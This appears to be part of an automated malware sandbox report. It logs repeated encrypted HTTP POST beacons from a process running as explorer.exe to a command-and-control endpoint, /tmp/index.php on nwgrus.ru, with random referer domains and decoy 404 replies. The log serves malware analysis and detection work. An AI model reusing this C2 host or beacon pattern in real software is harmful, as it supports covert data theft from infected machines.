                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    23192.168.2.44979478.89.199.216802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:03:01.839550972 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://mxjrhmxwrwqyxs.net/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 316
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:03:01.839601040 CEST316OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 7a 41 db 82
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vuzAR:}ec31pN'I@[d?K@W\EQ!BqaOH#D<sh!CvCS0d+_bTHl
                                    Oct 13, 2024 17:03:03.054527998 CEST137INHTTP/1.1 200 OK
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:03:02 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    24192.168.2.44980278.89.199.216802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:03:03.064747095 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://fcwffmgjsqp.org/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 343
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:03:03.064793110 CEST343OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 47 00 ad f3
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vuGoA\i8}\H9w]Th?P+4gVaF&*@:8\[GyEkVB$eUvM$zJyl7m
                                    Oct 13, 2024 17:03:04.301119089 CEST484INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:03:04 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    25192.168.2.44981078.89.199.216802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:03:04.311893940 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://vthbbsgwufn.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 132
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:03:04.311893940 CEST132OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 72 2a aa eb
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vur*s!j_HkXV6)0Cx
                                    Oct 13, 2024 17:03:05.654290915 CEST484INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:03:05 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    26192.168.2.44981978.89.199.216802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:03:05.663530111 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://xohyaostsydxib.net/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 247
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:03:05.663530111 CEST247OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 2b 3b da aa
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vu+;q,RFWDL{|wACiUABc)N)'ASau(XlW`zZBCG]RH"rFO\-VvzPX$q
                                    Oct 13, 2024 17:03:06.907557964 CEST484INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:03:06 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    27192.168.2.44982878.89.199.216802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:03:07.017113924 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://wbpwgsalvbneixte.net/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 238
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:03:07.017113924 CEST238OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 10 6b 2c 90 f5 76 0b 75 25 5d e4 fc
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vu%]\C NNr3r{R+r1!^0oRqKP@4k.2O&Bd`3DD<`Hz}./vo_=|n
                                    Oct 13, 2024 17:03:08.189560890 CEST484INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:03:07 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    28192.168.2.44983678.89.199.216802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:03:08.198231936 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://pbysepknkik.net/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 136
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:03:08.198271036 CEST136OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 11 6b 2c 90 f5 76 0b 75 3f 3f e2 92
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vu??p?QEcdTU/>-[Gy
                                    Oct 13, 2024 17:03:09.445173025 CEST484INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:03:09 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    29192.168.2.44984578.89.199.216802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:03:09.453996897 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://ijtbudkgjdatnpve.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 190
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:03:09.454029083 CEST190OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 16 6b 2c 90 f5 76 0b 75 4a 26 ea a0
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vuJ&j%qL`*DL)YF'Po+A!eWa10zD=']u2
                                    Oct 13, 2024 17:03:10.849014997 CEST484INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:03:10 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    30192.168.2.44985678.89.199.216802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:03:10.913814068 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://rjwxfpemkdjwjc.net/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 249
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:03:10.913814068 CEST249OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 17 6b 2c 90 f5 76 0b 75 3f 4c c4 83
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vu?L3rMaNssn.;hHVB#!oTy,&&k=i/zK12W69E;rwP\RCK%
                                    Oct 13, 2024 17:03:12.156563044 CEST484INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:03:11 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    31192.168.2.44986478.89.199.216802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:03:12.166707039 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://hnrmgadlbbkwfam.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 184
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:03:12.166743994 CEST184OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 14 6b 2c 90 f5 76 0b 75 7d 55 fc fe
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vu}UiO`aj{8gOaf`*}EPR'W9?(XADMG;yiM_H=Z=v
                                    Oct 13, 2024 17:03:13.541337967 CEST484INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:03:13 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
